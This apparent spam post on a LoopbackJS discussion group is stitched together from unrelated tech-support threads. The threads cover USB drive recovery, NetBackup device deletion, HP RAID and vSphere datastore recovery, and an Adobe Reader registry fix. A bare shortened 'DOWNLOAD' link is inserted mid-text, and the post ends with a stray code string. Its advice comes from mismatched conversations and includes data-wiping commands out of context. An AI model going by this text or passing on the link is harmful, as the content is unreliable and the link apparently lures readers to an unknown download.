Invalid Drive F

Twyla Plack

Jul 24, 2024, 9:10:45 PM (19 hours ago) Jul 24
to LoopbackJS

I've already recovered 945 GB data from a 1.81 TB USB external drive that contains 1.38 TB of data. But after two days of recovery, the process was taking too long and after 3 weeks of recovery !!! the percentage of recovery data was 68 % and the estimated time was 10 days ! So I stopped the recovery process and I launched a new scan.

The error message you are getting doesn't seem to have a definitive explanation from any amount of googling, although it usually means that for whatever reason the file system and/or the drive parameters are no longer able to be determined by the host computer.

invalid drive f

DOWNLOADhttps://blltly.com/2zLXmH

If you can provide as much info as you can, we'll have a look at the possibilities open to you. File recovery isn't an exact science sadly, and it isn't outside the bounds of possibility that if you unplug your drive and reattach it, Recuva might be able to access and scan it again.

The reason for recovery was a faulty drive. Suddenly, out of nowhere, it was impossible to read it. But I didn't give up and I went on to plug it time to time and one day it "appeared" again on windows explorer as you can see on the picture attached.

The "I/O device error" shown in your screenshot could be a number of things including a hardware issue like a loose connection. It could be good or bad news and without trying a number of things there isn't an immediate way to tell.

... and follow the different troubleshooting suggestions mentioned. It's a very informative read. Further to one of the suggestions made I've seen it mentioned that restarting your computer in "Safe Mode" may help, simply to eliminate the possible interference of third party software.

Lastly, you may still be carrying that bit of good fortune and unplugging and reinserting your drive may just work again for you, because as it stands I don't think any software will be able to access your drive whilst it's experiencing that particular error.

It's possible that although you can now access the drive, Windows may be having a problem with the file system. I'm thinking of your first screenshot in your second post which shows the drive as now consisting of "Unallocated Space", in other words "Raw" data.

This suggests a possible corruption to the boot sectors of the drive which would mean Windows can no longer read the file system or know the contents of the drive. But bear in mind Windows can only read the drive state from the boot sectors and your files will still be there.

And as a last resort there is also the possibility of repairing the boot sector information to restore the drive to it's original state, or to use other freeware to search for and restore the original partition of the drive. A similar end via a different route you could say.

I am running Netbackup 10.1.1 on a RedHat 8 server. I recently did a catalog restore recovering from a hardware failure and I am having trouble connecting to two of our drives in a robot. There are still ghosts of the drive path, though the robot has been deleted. Each time I try to delete the drive I get a message saying Invalid Drive Index and asking me to restart the media manager. Restarts of the host and netbackup services have had no change.

Suspect there is some 'confusion' in NBDB - without an unload it's only going to be a guess.
Delete everything (this shouldn't care about any issues, it's like hitting it with a hammer)

nbemmcmd -deletealldevices -allrecords

Then re-configre.

The only other way is manual SQL on NBDB, this needs Engineering and they will first request to use the above command anyway. It deletes all devices (robots and tapes) so in some circumstances you would avoid it due to the amount of devices to reconfigure.

Try disabling your external E drive, rebooting. Then go into the control panel and delete any UE4 associated files, if present. With the external drive still disabled, restart the download and installation process from scratch, including re-downloading the installer. (Delete the old installer if present before re-downloading the new one.) Install to your C drive, if possible. If successful, then you can reconnect your external drive.

the drives contain the raid info. So if you had 4 drives and try to repair with 3, it is missing one.
If you go to two drives that also changes form raid 5 to raid 1.
That is why you have to clean the drives to start over with the ISO.
But clean erases everything. So if you are trying to get to data DO NOT clean

The drives are impossible to find so I do not know where you got them and wonder if they might be counterfeit??? Use something like CrystalDiskInfo to see if the report the proper info. This is not a compatible drive, just a for example

So did you do diskpart clean with the panam.iso?
You are doing the middle step recreate correct?
Put the log file from the thumb drive in a dropbox share and post the link here for me to look at it

When we powered things back up today and logged into the vSphere client, we noticed that none of our guest VMs are available (they're all listed as "inaccessible"). And when I look at the hardware status in vSphere, the array controller and all attached drives appear as "Normal", but the drives all show up as "unconfigured disk".

An invalid drive movement was reported during POST. Modifications to the array configuration following an invalid drive movement will result in loss of old configuration information and contents of the original logical drives

Since we did nothing more than power the devices off and back on, what could've caused this to happen? I of course have the option to rebuild the array and start over, but I'm leery about the possibility of this happening again (especially since I have no idea what caused it).

So the HP Smart Array controller can handle a certain number of physical drive movements before it breaks the array configuration. Remember that HP RAID metadata lives on the physical drives and not the controller...

In this case, the P411 controller is trying to protect you. You may have sustained a multiple drive failure condition, hit a firmware bug, lost one of the two controller interfaces in the rear of the MSA60 or some other odd error.

First I attempted a fresh cold boot of the existing MSA, waited a couple minutes, then powered up the ESXi host, but the issue remained. I then shutdown the host and MSA, moved the drives into our spare MSA, powered it up, waited a couple minutes, then powered up the ESXi host; the issue still remained.

At that point, I figured I was pretty much screwed, and there was nothing during the initialization of the RAID controller where I had an option to re-enable a failed logical drive. So I booted into the RAID config, verified again that there were no logical drives present, and I created a new logical drive (RAID 1+0 with two spare drives; same as we did about 2 years ago when we first setup this host and storage).

Then I let the server boot back into vSphere and I accessed it via vCenter. The first thing I did was removed the host from inventory, then re-added it (I was hoping to clear all the inaccessible guest VMs this way, but it didn't clear them from the inventory). Once the host was back in my inventory, I removed each of the guest VMs one at a time. Once the inventory was cleared, I verified that no datastore existed and that the disks were basically ready and waiting as "data disks". So I went ahead and created a new datastore (again, same as we did a couple years ago, using VMFS). I was eventually prompted to specify a mount option and I had the option of "keep the existing signature". At this point, I figured it'd be worth a shot to keep the signature - if things didn't work out, I could always blow it away and re-create the datastore again. After I finished the process of building the datastore with the keep signature option, I tried navigating to the datastore to see if anything was in it - it appeared empty. Just out of curiosity, I SSH'd to the host and checked from there, and to my surprise, I could see all my old data and all my old guest VMs! I went back into vCenter and re-scanned storage and refreshed the console, and all of our old guest VMs were there! I re-registered each VM and was able to recover everything! All of our guest VMs are back up and successfully communicating on the network.

For several days i have been unsuccessful in installing either Adobe Reader 9.3.3 or 8.2. The Reader program downloads fine and is set-up 100%, but when the Adobe installer window appears the infamous 1327 Error message appears and the process stops. I am running GATEWAY- SOLO 5300 Notebook, (Circa 2000) with only a 10 GB HD and a Windows XP Pro OS, on top of the original Me OS.

I have cleaned and defragged my HD; I have searched my files and programs for anything resembling or referencing DRIVE E:\ and have found nothing. I have removed all Adobe progams and removed the Windows Installer 3.1 program and downloaded and reinstalled a clean program.I have downloaded AdbRdr 9.3.3 at least 8 times using Firefox and IE browsers. But nothing seems to work. One of the suggestions was to Edit the Registry and examine the various bits and bytes and compare them to a clean Registry in a similar machine. Unfortunately, my other computer is an old 7500 Power MacIntosh so that wont help. I am a Telecomm Engineer, but not a Systems Programmer, examining and interpreting C++ code is beyond my area of expertise. If anyone has any constructive ideas I would like to hear them, as I am at the point of re=loading my XP Pro OS out of sheer desperation, but that probably has its own set of land-mines.

Verify that registry entries do not contain invalid drive letters that might be causing this error:
Important: The following steps require you to modify the Windows registry. Modifications to the Windows registry, if not done correctly, can cause serious problems to a Windows system

Click Run. The Run dialog box opens.
In the Open field, type regedit, and then click OK. The Registry Editor opens.
In the Registry Editor, locate the following registry key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

In the right pane, note the values in the Data column of each entry. If any value contains a drive that is not correct for your computer, right-click the entry and select Modify.
Type the correct drive letter in the Value data field, and then click OK. For example, if one of the values is "X:\Documents and Settings\Administrator", the drive letter should be changed to a valid drive on the system, such as C:\Documents and Settings\Administrator".
Repeat steps 4 and 5 for each entry whose Data value contains an incorrect drive.
Repeat steps 3 through 6 for each of the following registry keys:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

Close the Registry Editor and run the installation again.

4a15465005